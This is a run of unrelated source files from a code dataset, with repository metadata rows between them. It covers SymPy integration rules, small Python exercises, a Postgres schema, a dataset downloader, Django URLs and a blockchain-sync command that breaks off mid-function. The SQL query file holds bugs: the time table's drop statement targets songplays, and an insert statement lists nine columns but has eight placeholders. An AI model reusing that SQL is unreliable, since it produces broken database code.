return -Dist(a*n/(b*d*e*log(F)), Int(x**(m + n + S(-1))*(F**(e*(c + d*x))*b + a*x**n)**p, x), x) - Dist(m/(b*d*e*(p + S(1))*log(F)), Int(x**(m + S(-1))*(F**(e*(c + d*x))*b + a*x**n)**(p + S(1)), x), x) + Simp(x**m*(F**(e*(c + d*x))*b + a*x**n)**(p + S(1))/(b*d*e*(p + S(1))*log(F)), x)
rule1983 = ReplacementRule(pattern1983, replacement1983)
def With1984(v, u, m, f, b, g, c, a, x, F):
q = Rt(-S(4)*a*c + b**S(2), S(2))
rubi.append(1984)
return Dist(S(2)*c/q, Int((f + g*x)**m/(S(2)*F**u*c + b - q), x), x) - Dist(S(2)*c/q, Int((f + g*x)**m/(S(2)*F**u*c + b + q), x), x)
pattern1984 = Pattern(Integral((x_*WC('g', S(1)) + WC('f', S(0)))**WC('m', S(1))/(F_**u_*WC('b', S(1)) + F_**v_*WC('c', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons125, cons208, cons1144, cons68, cons226, cons62)
rule1984 = ReplacementRule(pattern1984, With1984)
def With1985(v, u, m, f, b, g, c, a, x, F):
q = Rt(-S(4)*a*c + b**S(2), S(2))
rubi.append(1985)
return Dist(S(2)*c/q, Int(F**u*(f + g*x)**m/(S(2)*F**u*c + b - q), x), x) - Dist(S(2)*c/q, Int(F**u*(f + g*x)**m/(S(2)*F**u*c + b + q), x), x)
pattern1985 = Pattern(Integral(F_**u_*(x_*WC('g', S(1)) + WC('f', S(0)))**WC('m', S(1))/(F_**u_*WC('b', S(1)) + F_**v_*WC('c', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons125, cons208, cons1144, cons68, cons226, cons62)
rule1985 = ReplacementRule(pattern1985, With1985)
def With1986(v, u, m, f, b, g, i, c, a, x, h, F):
q = Rt(-S(4)*a*c + b**S(2), S(2))
rubi.append(1986)
return -Dist(-i + (-b*i + S(2)*c*h)/q, Int((f + g*x)**m/(S(2)*F**u*c + b + q), x), x) + Dist(i + (-b*i + S(2)*c*h)/q, Int((f + g*x)**m/(S(2)*F**u*c + b - q), x), x)
pattern1986 = Pattern(Integral((F_**u_*WC('i', S(1)) + h_)*(x_*WC('g', S(1)) + WC('f', S(0)))**WC('m', S(1))/(F_**u_*WC('b', S(1)) + F_**v_*WC('c', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons125, cons208, cons209, cons224, cons1144, cons68, cons226, cons62)
rule1986 = ReplacementRule(pattern1986, With1986)
def With1987(v, m, b, d, c, a, x, F):
u = IntHide(S(1)/(F**v*b + F**(c + d*x)*a), x)
rubi.append(1987)
return -Dist(m, Int(u*x**(m + S(-1)), x), x) + Simp(u*x**m, x)
pattern1987 = Pattern(Integral(x_**WC('m', S(1))/(F_**v_*WC('b', S(1)) + F_**(x_*WC('d', S(1)) + WC('c', S(0)))*WC('a', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons1145, cons31, cons168)
rule1987 = ReplacementRule(pattern1987, With1987)
pattern1988 = Pattern(Integral(u_/(F_**v_*WC('b', S(1)) + F_**w_*WC('c', S(1)) + a_), x_), cons1099, cons2, cons3, cons7, cons552, cons1146, cons1147, cons1148)
def replacement1988(v, w, u, b, c, a, x, F):
rubi.append(1988)
return Int(F**v*u/(F**(S(2)*v)*b + F**v*a + c), x)
rule1988 = ReplacementRule(pattern1988, replacement1988)
pattern1989 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))/(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons208, cons4, cons1149)
def replacement1989(g, b, d, a, n, c, x, F, e):
rubi.append(1989)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), S(1)/(a + b*x + c*x**S(2)), x), x)
rule1989 = ReplacementRule(pattern1989, replacement1989)
pattern1990 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))/(a_ + x_**S(2)*WC('c', S(1))), x_), cons1099, cons2, cons7, cons27, cons48, cons208, cons4, cons1150)
def replacement1990(g, d, c, n, a, x, F, e):
rubi.append(1990)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), S(1)/(a + c*x**S(2)), x), x)
rule1990 = ReplacementRule(pattern1990, replacement1990)
pattern1991 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))*u_**WC('m', S(1))/(c_*x_**S(2) + x_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons208, cons4, cons804, cons17)
def replacement1991(u, m, g, b, d, a, n, c, x, F, e):
rubi.append(1991)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), u**m/(a + b*x + c*x**S(2)), x), x)
rule1991 = ReplacementRule(pattern1991, replacement1991)
pattern1992 = Pattern(Integral(F_**((x_*WC('e', S(1)) + WC('d', S(0)))**WC('n', S(1))*WC('g', S(1)))*u_**WC('m', S(1))/(a_ + c_*x_**S(2)), x_), cons1099, cons2, cons7, cons27, cons48, cons208, cons4, cons804, cons17)
def replacement1992(u, m, g, d, a, n, c, x, F, e):
rubi.append(1992)
return Int(ExpandIntegrand(F**(g*(d + e*x)**n), u**m/(a + c*x**S(2)), x), x)
rule1992 = ReplacementRule(pattern1992, replacement1992)
pattern1993 = Pattern(Integral(F_**((x_**S(4)*WC('b', S(1)) + WC('a', S(0)))/x_**S(2)), x_), cons1099, cons2, cons3, cons1151)
def replacement1993(x, a, b, F):
rubi.append(1993)
return -Simp(sqrt(Pi)*Erf((-x**S(2)*sqrt(-b*log(F)) + sqrt(-a*log(F)))/x)*exp(-S(2)*sqrt(-a*log(F))*sqrt(-b*log(F)))/(S(4)*sqrt(-b*log(F))), x) + Simp(sqrt(Pi)*Erf((x**S(2)*sqrt(-b*log(F)) + sqrt(-a*log(F)))/x)*exp(S(2)*sqrt(-a*log(F))*sqrt(-b*log(F)))/(S(4)*sqrt(-b*log(F))), x)
rule1993 = ReplacementRule(pattern1993, replacement1993)
pattern1994 = Pattern(Integral(x_**WC('m', S(1))*(x_**WC('m', S(1)) + exp(x_))**n_, x_), cons93, cons168, cons463, cons1152)
def replacement1994(x, m, n):
rubi.append(1994)
return Dist(m, Int(x**(m + S(-1))*(x**m + exp(x))**n, x), x) + Int((x**m + exp(x))**(n + S(1)), x) - Simp((x**m + exp(x))**(n + S(1))/(n + S(1)), x)
rule1994 = ReplacementRule(pattern1994, replacement1994)
pattern1995 = Pattern(Integral(log(a_ + (F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons4, cons43)
def replacement1995(b, d, c, n, a, x, F, e):
rubi.append(1995)
return Dist(S(1)/(d*e*n*log(F)), Subst(Int(log(a + b*x)/x, x), x, (F**(e*(c + d*x)))**n), x)
rule1995 = ReplacementRule(pattern1995, replacement1995)
pattern1996 = Pattern(Integral(log(a_ + (F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons4, cons448)
def replacement1996(b, d, c, n, a, x, F, e):
rubi.append(1996)
return -Dist(b*d*e*n*log(F), Int(x*(F**(e*(c + d*x)))**n/(a + b*(F**(e*(c + d*x)))**n), x), x) + Simp(x*log(a + b*(F**(e*(c + d*x)))**n), x)
rule1996 = ReplacementRule(pattern1996, replacement1996)
pattern1997 = Pattern(Integral((F_**v_*WC('a', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons2, cons4, cons23)
def replacement1997(v, u, a, n, x, F):
rubi.append(1997)
return Dist(F**(-n*v)*(F**v*a)**n, Int(F**(n*v)*u, x), x)
rule1997 = ReplacementRule(pattern1997, replacement1997)
def With1998(x, u):
v = FunctionOfExponential(u, x)
rubi.append(1998)
return Dist(v/D(v, x), Subst(Int(FunctionOfExponentialFunction(u, x)/x, x), x, v), x)
pattern1998 = Pattern(Integral(u_, x_), cons1153)
rule1998 = ReplacementRule(pattern1998, With1998)
pattern1999 = Pattern(Integral((F_**v_*WC('a', S(1)) + F_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons2, cons3, cons4, cons196, cons1154)
def replacement1999(v, w, u, b, a, n, x, F):
rubi.append(1999)
return Int(F**(n*v)*u*(F**ExpandToSum(-v + w, x)*b + a)**n, x)
rule1999 = ReplacementRule(pattern1999, replacement1999)
pattern2000 = Pattern(Integral((F_**v_*WC('a', S(1)) + G_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons1137, cons2, cons3, cons4, cons196, cons1154)
def replacement2000(v, w, u, b, G, a, n, x, F):
rubi.append(2000)
return Int(F**(n*v)*u*(a + b*exp(ExpandToSum(-v*log(F) + w*log(G), x)))**n, x)
rule2000 = ReplacementRule(pattern2000, replacement2000)
pattern2001 = Pattern(Integral((F_**v_*WC('a', S(1)) + F_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons2, cons3, cons4, cons23, cons1154)
def replacement2001(v, w, u, b, a, n, x, F):
rubi.append(2001)
return Dist(F**(-n*v)*(F**v*a + F**w*b)**n*(F**ExpandToSum(-v + w, x)*b + a)**(-n), Int(F**(n*v)*u*(F**ExpandToSum(-v + w, x)*b + a)**n, x), x)
rule2001 = ReplacementRule(pattern2001, replacement2001)
pattern2002 = Pattern(Integral((F_**v_*WC('a', S(1)) + G_**w_*WC('b', S(1)))**n_*WC('u', S(1)), x_), cons1099, cons1137, cons2, cons3, cons4, cons23, cons1154)
def replacement2002(v, w, u, b, G, a, n, x, F):
rubi.append(2002)
return Dist(F**(-n*v)*(a + b*exp(ExpandToSum(-v*log(F) + w*log(G), x)))**(-n)*(F**v*a + G**w*b)**n, Int(F**(n*v)*u*(a + b*exp(ExpandToSum(-v*log(F) + w*log(G), x)))**n, x), x)
rule2002 = ReplacementRule(pattern2002, replacement2002)
pattern2003 = Pattern(Integral(F_**v_*G_**w_*WC('u', S(1)), x_), cons1099, cons1137, cons1155)
def replacement2003(v, w, u, G, x, F):
rubi.append(2003)
return Int(u*NormalizeIntegrand(exp(v*log(F) + w*log(G)), x), x)
rule2003 = ReplacementRule(pattern2003, replacement2003)
def With2004(v, w, u, y, x, F):
if isinstance(x, (int, Integer, float, Float)):
return False
z = v*y/(D(u, x)*log(F))
if ZeroQ(-w*y + D(z, x)):
return True
return False
pattern2004 = Pattern(Integral(F_**u_*(v_ + w_)*WC('y', S(1)), x_), cons1099, cons1099, CustomConstraint(With2004))
def replacement2004(v, w, u, y, x, F):
z = v*y/(D(u, x)*log(F))
rubi.append(2004)
return Simp(F**u*z, x)
rule2004 = ReplacementRule(pattern2004, replacement2004)
def With2005(v, w, u, n, x, F):
if isinstance(x, (int, Integer, float, Float)):
return False
z = v*D(u, x)*log(F) + (n + S(1))*D(v, x)
if And(Equal(Exponent(w, x), Exponent(z, x)), ZeroQ(w*Coefficient(z, x, Exponent(z, x)) - z*Coefficient(w, x, Exponent(w, x)))):
return True
return False
pattern2005 = Pattern(Integral(F_**u_*v_**WC('n', S(1))*w_, x_), cons1099, cons4, cons804, cons1017, cons1109, CustomConstraint(With2005))
def replacement2005(v, w, u, n, x, F):
z = v*D(u, x)*log(F) + (n + S(1))*D(v, x)
rubi.append(2005)
return Simp(F**u*v**(n + S(1))*Coefficient(w, x, Exponent(w, x))/Coefficient(z, x, Exponent(z, x)), x)
rule2005 = ReplacementRule(pattern2005, replacement2005)
return [rule1901, rule1902, rule1903, rule1904, rule1905, rule1906, rule1907, rule1908, rule1909, rule1910, rule1911, rule1912, rule1913, rule1914, rule1915, rule1916, rule1917, rule1918, rule1919, rule1920, rule1921, rule1922, rule1923, rule1924, rule1925, rule1926, rule1927, rule1928, rule1929, rule1930, rule1931, rule1932, rule1933, rule1934, rule1935, rule1936, rule1937, rule1938, rule1939, rule1940, rule1941, rule1942, rule1943, rule1944, rule1945, rule1946, rule1947, rule1948, rule1949, rule1950, rule1951, rule1952, rule1953, rule1954, rule1955, rule1956, rule1957, rule1958, rule1959, rule1960, rule1961, rule1962, rule1963, rule1964, rule1965, rule1966, rule1967, rule1968, rule1969, rule1970, rule1971, rule1972, rule1973, rule1974, rule1975, rule1976, rule1977, rule1978, rule1979, rule1980, rule1981, rule1982, rule1983, rule1984, rule1985, rule1986, rule1987, rule1988, rule1989, rule1990, rule1991, rule1992, rule1993, rule1994, rule1995, rule1996, rule1997, rule1998, rule1999, rule2000, rule2001, rule2002, rule2003, rule2004, rule2005, ]
| [
"[email protected]"
]
| |
08abe221a6e2af6878de699a1d34b050881e8401 | 2b19f22b47dfd8c01ed2acf335a88ef3271de873 | /IOI/difference.py | 5b3c5f89ee7d33064fe73fa1fd734200918f80c5 | []
# Consume stdin one line at a time until EOF; each line carries two
# integers, and the absolute difference between them is printed.
try:
    while True:
        a, b = map(int, input().split())
        print(abs(a - b))
except EOFError:
    pass
| [
"[email protected]"
]
| |
5581f1877e0859073d8bad360dbf8d6e6b5ed449 | 43949d3f05bf1d1212cc25fd5766a47940723f7b | /generators/gen.py | 5202bb3d33b604cfc3856de4de253eacca2d802f | []
def my_gen():
    """Yield 1, 2, 3 in turn, printing a message before each value.

    Demonstrates lazy evaluation: each print statement runs only when the
    corresponding value is requested with next(), not when the generator
    object is created.
    """
    value = 1
    print('This is printed first')
    yield value

    value += 1
    print('This is printed second')
    yield value

    value += 1
    print('This is printed at last')
    yield value
a = my_gen()  # creates the generator object; none of the body runs yet
next(a)  # runs up to the first yield: prints the first message, returns 1
next(a)  # resumes to the second yield: prints the second message, returns 2
next(a)  # resumes to the final yield: returns 3; a further next() call (as on the following line) raises StopIteration
next(a) | [
"[email protected]"
]
| |
1b58373ac66d0ddb7dc9aeda27c62602f8569f74 | de707c94c91f554d549e604737b72e6c86eb0755 | /math/0x01-plotting/2-change_scale.py | 480bf1b1af07c3d6f3b678dbbd1083ba7969a535 | []
| no_license | ejonakodra/holbertonschool-machine_learning-1 | 885cf89c1737573228071e4dc8e26304f393bc30 | 8834b201ca84937365e4dcc0fac978656cdf5293 | refs/heads/main | 2023-07-10T09:11:01.298863 | 2021-08-11T03:43:59 | 2021-08-11T03:43:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | #!/usr/bin/env python3
""" plots x, y as a line graph where y-axis is scaled logarithmically """
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(0, 28651, 5730)
r = np.log(0.5)
t = 5730
y = np.exp((r / t) * x)
plt.plot(x, y)
plt.xlabel('Time (years)')
plt.ylabel('Fraction Remaining')
plt.title("Exponential Decay of C-14")
plt.yscale("log")
plt.xlim((0, 28650))
plt.show()
| [
"[email protected]"
]
| |
1c3fe0cc2873b5858a438ae7dbeaf43f1ace5c25 | 8c6466e12bb3351031c25677127dc86d13bd9b19 | /Project data Modelling with Postgress/sql_queries.py | 09f272907dc0ece9579ce135decdb08810006f0f | []
| no_license | andreodendaal/udacity_data_engineering | ac8eb889db002014b3ccf1fe15b16f77361b8d55 | 03524ffbd1830d168761fcc996cab329dd064977 | refs/heads/master | 2020-05-05T09:24:02.921194 | 2020-01-15T20:22:14 | 2020-01-15T20:22:14 | 179,902,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,481 | py | # DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
user_table_drop = "DROP TABLE IF EXISTS users;"
song_table_drop = "DROP TABLE IF EXISTS songs;"
artist_table_drop = "DROP TABLE IF EXISTS artists;"
time_table_drop = "DROP TABLE IF EXISTS songplays;"
# CREATE TABLES
songplay_table_create = ("""CREATE TABLE IF NOT EXISTS songplays (songplay_id varchar, start_time timestamp, user_id varchar, level varchar, song_id varchar, artist_id varchar, session_id varchar, location varchar, user_agent varchar, PRIMARY KEY (songplay_id));""")
user_table_create = ("""CREATE TABLE IF NOT EXISTS users (user_id varchar, first_name varchar, last_name varchar, gender varchar, level varchar, PRIMARY KEY (user_id));
""")
song_table_create = ("""CREATE TABLE IF NOT EXISTS songs (song_id varchar, title varchar, artist_id varchar, year int, duration int, PRIMARY KEY (song_id));
""")
#song_id title artist_id year duration
artist_table_create = ("""CREATE TABLE IF NOT EXISTS artists (artist_id varchar, name varchar, location varchar, lattitude float, longitude float, PRIMARY KEY (artist_id));
""")
# https://www.postgresql.org/docs/9.1/functions-datetime.html
time_table_create = ("""CREATE TABLE IF NOT EXISTS time (start_time timestamp, hour int, day int, week int, month int, year int, weekday int, PRIMARY KEY (start_time));
""")
# INSERT RECORDS
songplay_table_insert = ("""INSERT INTO songplays (songplay_id, start_time, user_id, level, song_id, artist_id, session_id, location, user_agen) VALUES(%s, %s, %s, %s, %s, %s, %s, %s);""")
user_table_insert = ("""INSERT INTO users (user_id, first_name, last_name, gender, level) VALUES(%s, %s, %s, %s, %s ) ON CONFLICT (user_id) DO NOTHING;""")
song_table_insert = ("""INSERT INTO songs (song_id, title, artist_id, year, duration) VALUES(%s, %s, %s, %s, %s);""")
artist_table_insert = ("""INSERT INTO artists (artist_id, name, location, lattitude, longitude) VALUES(%s, %s, %s, %s, %s);""")
time_table_insert = ("""INSERT INTO time (start_time, hour, day, week, month, year, weekday) VALUES(%s, %s, %s, %s, %s, %s, %s);""")
# FIND SONGS
song_select = ("""
""")
# QUERY LISTS
#create_table_queries = [songplay_table_create]
create_table_queries = [songplay_table_create, user_table_create, song_table_create, artist_table_create, time_table_create]
#drop_table_queries = [songplay_table_drop]
drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop] | [
"[email protected]"
]
| |
d485cc88de5469d66c7dbc503dbb0e3206144138 | b1ffcbd977595bccf15dd56e965bda62867d1e10 | /omrdatasettools/downloaders/PrintedMusicSymbolsDatasetDownloader.py | 818cb93eca0478aa48e520f084374eba04cbd048 | [
"CC-BY-NC-SA-4.0",
"GPL-2.0-only",
"CC-BY-SA-3.0",
"MIT",
"GPL-1.0-or-later",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"AGPL-3.0-only"
]
| permissive | fzalkow/OMR-Datasets | 7ded5bb9278e47c84a16de01081876d6bb2e6dbe | c9e7a986199998d6a735875503e6dcce5fdf1193 | refs/heads/master | 2020-09-14T15:30:45.824800 | 2020-01-06T12:07:52 | 2020-01-06T12:07:52 | 223,169,792 | 0 | 0 | MIT | 2019-11-21T12:32:31 | 2019-11-21T12:32:30 | null | UTF-8 | Python | false | false | 1,896 | py | import argparse
import os
from omrdatasettools.downloaders.DatasetDownloader import DatasetDownloader
class PrintedMusicSymbolsDatasetDownloader(DatasetDownloader):
""" Loads the Printed Music Symbols dataset
https://github.com/apacha/PrintedMusicSymbolsDataset
Copyright 2017 by Alexander Pacha under MIT license
"""
def get_dataset_download_url(self) -> str:
# If this link does not work anymore, find the images at https://github.com/apacha/PrintedMusicSymbolsDataset
return "https://github.com/apacha/OMR-Datasets/releases/download/datasets/PrintedMusicSymbolsDataset.zip"
def get_dataset_filename(self) -> str:
return "PrintedMusicSymbolsDataset.zip"
def download_and_extract_dataset(self, destination_directory: str):
if not os.path.exists(self.get_dataset_filename()):
print("Downloading Printed Music Symbol dataset...")
self.download_file(self.get_dataset_download_url(), self.get_dataset_filename())
print("Extracting Printed Music Symbol dataset...")
absolute_path_to_temp_folder = os.path.abspath('PrintedMusicSymbolsDataset')
self.extract_dataset(absolute_path_to_temp_folder)
DatasetDownloader.copytree(os.path.join(absolute_path_to_temp_folder, "PrintedMusicSymbolsDataset"),
os.path.abspath(destination_directory))
self.clean_up_temp_directory(absolute_path_to_temp_folder)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset_directory",
type=str,
default="../data/printed_images",
help="The directory, where the extracted dataset will be copied to")
flags, unparsed = parser.parse_known_args()
dataset = PrintedMusicSymbolsDatasetDownloader()
dataset.download_and_extract_dataset(flags.dataset_directory)
| [
"[email protected]"
]
| |
333c48d27ec8d5b0ea5633bffadd6e27638c0522 | 315450354c6ddeda9269ffa4c96750783963d629 | /CMSSW_7_0_4/src/Configuration/TotemCommon/python/__init__.py | 6cf341a440a2c973942ba5aad7ebac154203e274 | []
| no_license | elizamelo/CMSTOTEMSim | e5928d49edb32cbfeae0aedfcf7bd3131211627e | b415e0ff0dad101be5e5de1def59c5894d7ca3e8 | refs/heads/master | 2021-05-01T01:31:38.139992 | 2017-09-12T17:07:12 | 2017-09-12T17:07:12 | 76,041,270 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | #Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/Configuration/TotemCommon/',1)[0])+'/cfipython/slc6_amd64_gcc481/Configuration/TotemCommon')
| [
"[email protected]"
]
| |
5ddfb724efcc821a79c4e342fe9315c9e87c4d99 | 038e6e41d117431869edad4952a5b1463d5131bc | /donations/urls.py | f1cd42016e4516213c853992d4476f9cab832f42 | [
"MIT"
]
| permissive | MikaelSantilio/aprepi-django | c49290855b7c83ecaf08de82ee9eedf8e8baa15a | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | refs/heads/master | 2023-06-19T00:18:15.986920 | 2021-06-15T20:15:59 | 2021-06-15T20:15:59 | 329,428,268 | 0 | 1 | MIT | 2021-02-05T16:21:45 | 2021-01-13T20:50:18 | Python | UTF-8 | Python | false | false | 1,043 | py | from django.urls import path
from donations import views
app_name = "donations"
urlpatterns = [
path('', views.MakeDonation.as_view(), name='unique-donation'),
path('historico/', views.DonationListView.as_view(), name='list'),
# path('checkout/<str:value>', views.MPCheckout.as_view(), name='mp-checkout'),
# path('anonima/', views.MakeAnonymousDonation.as_view(), name='anonymous-donation'),
# path('recorrente/', views.MakeRecurringDonation.as_view(), name='recurring-donation'),
path('obrigado/', views.ThankYouView.as_view(), name='thankyou'),
# path('cartoes/', views.CreditCardListView.as_view(), name='list-cc'),
# path('cartoes/cadastrar', views.CreditCardCreateView.as_view(), name='create-cc'),
# path('cartoes/<int:pk>', views.CreditCardDetailView.as_view(), name='detail-cc'),
# path('cartoes/atualizar/<int:pk>',
# views.CreditCardUpdateView.as_view(), name='update-cc'),
# path('cartoes/apagar/<int:pk>',
# views.CreditCardDeleteView.as_view(), name='delete-cc')
]
| [
"[email protected]"
]
| |
427ad4d206db8a5e4f376c716b47b039b82fba5a | 033da72a51c76e5510a06be93229a547a538cf28 | /Data Engineer with Python Track/03. Streamlined Data Ingestion with Pandas/Chapter/03. Importing Data from Databases/03-Selecting columns with SQL.py | 9ce77ea8c2536cbf0133ba6d5c5008e87273de10 | []
| no_license | ikhwan1366/Datacamp | d5dcd40c1bfeb04248977014260936b1fb1d3065 | 7738614eaebec446842d89177ae2bc30ab0f2551 | refs/heads/master | 2023-03-06T13:41:06.522721 | 2021-02-17T22:41:54 | 2021-02-17T22:41:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | '''
Selecting columns with SQL
Datasets can contain columns that are not required for an analysis, like the weather table in data.db does. Some, such as elevation, are redundant, since all observations occurred at the same place, while others contain variables we are not interested in. After making a database engine, you'll write a query to SELECT only the date and temperature columns, and pass both to read_sql() to make a data frame of high and low temperature readings.
pandas has been loaded as pd, and create_engine() has been imported from sqlalchemy.
Note: The SQL checker is quite picky about column positions and expects fields to be selected in the specified order.
Instructions
100 XP
- Create a database engine for data.db.
- Write a SQL query that SELECTs the date, tmax, and tmin columns from the weather table.
- Make a data frame by passing the query and engine to read_sql() and assign the resulting data frame to temperatures.
'''
# Create database engine for data.db
engine = create_engine('sqlite:///data.db')
# Write query to get date, tmax, and tmin from weather
query = """
SELECT date,
tmax,
tmin
FROM weather;
"""
# Make a data frame by passing query and engine to read_sql()
temperatures = pd.read_sql(query, engine)
# View the resulting data frame
print(temperatures)
| [
"[email protected]"
]
| |
27c0b921e96a11906286be5d2fb8bac1c678ad1c | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc152/abc152_f/9661160.py | 040bdabbffd7805e7f362fb6eff11285789dc375 | []
| no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import collections
from itertools import combinations
N = int(input())
ab = [tuple(map(int, input().split())) for i in range(N-1)]
M = int(input())
uv = [tuple(map(int, input().split())) for i in range(M)]
def popcount(x):
x = x - ((x >> 1) & 0x5555555555555555)
x = (x & 0x3333333333333333) + ((x >> 2) & 0x3333333333333333)
x = (x + (x >> 4)) & 0x0f0f0f0f0f0f0f0f
x = x + (x >> 8)
x = x + (x >> 16)
x = x + (x >> 32)
return x & 0x0000007f
G = [[-1]*N for i in range(N)]
for i in range(N-1):
a, b = ab[i]
a -= 1
b -= 1
G[a][b] = i
G[b][a] = i
q = collections.deque()
G2 = [[0 for j in range(N)] for i in range(N)]
for i in range(N):
q.append((i, 0))
reached = [False]*N
reached[i] = True
while(q):
x, s = q.popleft()
for y in range(N):
if G[x][y] == -1 or reached[y]:
continue
else:
G2[i][y] = s | (1 << G[x][y])
q.append((y, s | 1 << G[x][y]))
reached[y] = True
ans = 2**(N-1)
ans2 = 0
for i in range(1, 2**M):
tmp = 2**(N-1) - 1
for j in range(M):
if (i >> j) % 2 == 1:
u, v = uv[j]
u -= 1
v -= 1
tmp &= ~G2[u][v]
ans2 += ((-1)**(popcount(i)-1)) * (1 << popcount(tmp))
# print(ans2, i)
print(ans-ans2)
| [
"[email protected]"
]
| |
f37bf6d7e69087bad285023e03ef4723bb8ba36b | 397e125e94f4f139f2bf5055824d81f24b8b1757 | /ABC/145/B.py | c96cb419eb5372858a0ff144fa21e734a83f0e9e | []
| no_license | tails1434/Atcoder | ecbab6ee238e3f225551297db961b1b502841fa4 | e7c7fed36be46bbaaf020a70997842240ba98d62 | refs/heads/master | 2021-07-07T00:31:49.235625 | 2020-09-30T01:42:01 | 2020-09-30T01:42:01 | 189,009,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | def main():
N = int(input())
S = input()
if N % 2 != 0:
print('No')
else:
A = S[:N//2]
B = S[N//2:N]
if A == B:
print('Yes')
else:
print('No')
if __name__ == "__main__":
main() | [
"[email protected]"
]
| |
9900fb23966c7170f49463766fb9144b67096696 | 6323bd983f6304d95e62909bfc4883d2f9ef1a14 | /Leetcode/Medium/Range Sum query.py | 4e7d5a0537c1ad2d9022d5981e76015b68d98328 | []
| no_license | akshay-sahu-dev/PySolutions | 4c2d67d5f66fe83a6e302e1742a5bf17dafe2b99 | 83552962805768914034a284bf39197f52ca5017 | refs/heads/master | 2023-06-17T06:36:50.252943 | 2021-07-09T17:28:53 | 2021-07-09T17:28:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | ## https://leetcode.com/problems/range-sum-query-immutable
class NumArray:
def __init__(self, nums: List[int]):
self.nums = nums
def sumRange(self, i: int, j: int) -> int:
return sum(self.nums[i:j+1])
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j) | [
"[email protected]"
]
| |
d81bf82845c2f8e12980533f9d59d8e047901438 | e07da133c4efa517e716af2bdf67a46f88a65b42 | /hub20/apps/blockchain/management/commands/sync_blockchain.py | b28399a2a20dc1fa41b00b74038c1e23e9e449e6 | [
"MIT"
]
| permissive | cryptobuks1/hub20 | be1da5f77a884f70068fd41edaa45d5e65b7c35e | 3a4d9cf16ed9d91495ac1a28c464ffb05e9f837b | refs/heads/master | 2022-04-19T21:26:15.386567 | 2020-04-19T07:17:47 | 2020-04-19T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | import asyncio
import logging
from django.core.management.base import BaseCommand
from hub20.apps.blockchain.app_settings import START_BLOCK_NUMBER
from hub20.apps.blockchain.models import Block, make_web3
logger = logging.getLogger(__name__)
def split_block_lists(block_numbers, group_size=25):
for n in range(0, len(block_numbers), group_size):
yield block_numbers[n : n + group_size]
async def make_blocks_in_range(w3, start, end, speed=25):
chain_id = int(w3.net.version)
chain_blocks = Block.objects.filter(chain=chain_id)
block_range = (start, end)
recorded_block_set = set(
chain_blocks.filter(number__range=block_range).values_list("number", flat=True)
)
range_set = set(range(*block_range))
missing_blocks = list(range_set.difference(recorded_block_set))[::-1]
counter = 0
logger.info(f"{len(missing_blocks)} missing blocks between {start} and {end}")
for block_list in split_block_lists(missing_blocks, group_size=speed):
for block_number in block_list:
counter += 1
if (counter % speed) == 0:
await asyncio.sleep(1)
Block.make_all(block_number, w3)
else:
await asyncio.sleep(1)
async def save_new_blocks(w3):
current_block_number = w3.eth.blockNumber
while True:
logger.info(f"Current block number: {current_block_number}")
block_number = w3.eth.blockNumber
if block_number > current_block_number:
Block.make_all(block_number, w3)
current_block_number = block_number
else:
await asyncio.sleep(5)
async def backfill(w3):
SCAN_SIZE = 5000
end = w3.eth.blockNumber
while end > START_BLOCK_NUMBER:
start = max(end - SCAN_SIZE, START_BLOCK_NUMBER)
await make_blocks_in_range(w3, start, end)
end = start
logger.info(f"Backfill complete. All blocks from {end} now recorded")
class Command(BaseCommand):
help = "Listens to new blocks and transactions on event loop and saves on DB"
def handle(self, *args, **options):
w3 = make_web3()
loop = asyncio.get_event_loop()
try:
